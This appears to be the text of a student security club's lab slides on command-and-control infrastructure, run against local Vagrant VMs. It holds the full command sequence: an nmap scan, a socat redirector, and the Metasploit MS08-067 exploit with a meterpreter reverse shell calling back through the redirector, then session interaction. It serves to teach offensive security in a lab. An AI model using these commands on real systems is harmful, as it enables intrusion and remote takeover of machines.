orgsync.com/79368/

C2 Intro

First Vagrant!

# Download the lab Vagrantfile (either wget or curl works)
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile
curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile
# Bring up the lab VMs defined in the Vagrantfile
vagrant up

Learning from others

Visualization

Housekeeping...

  • fixing windows
    • check - 
    • fix
    • verify
  • set up redir
vagrant ssh winxp
ipconfig
vagrant ssh redir
# Listen on port 443 and relay each incoming connection to 192.168.55.2:443
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443

Recon!

  • Vagrant commands
    • see all vms
vagrant global-status
  • Now Kali
vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls

Recon

Exploitation - metasploit

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp         # This is the payload I set
show options                                        # This shows all the options for the payload and exploit
set RHOST 192.168.55.3                              # The host you are attacking
set LHOST 192.168.55.4                              # The external IP that the payload should connect to
set LPORT 443                                       # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2         # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false                             # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z                                       # Start the exploit as a job. Do not automatically interact with new sessions.

## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat

C2 infrastructure

By 49th Security Division
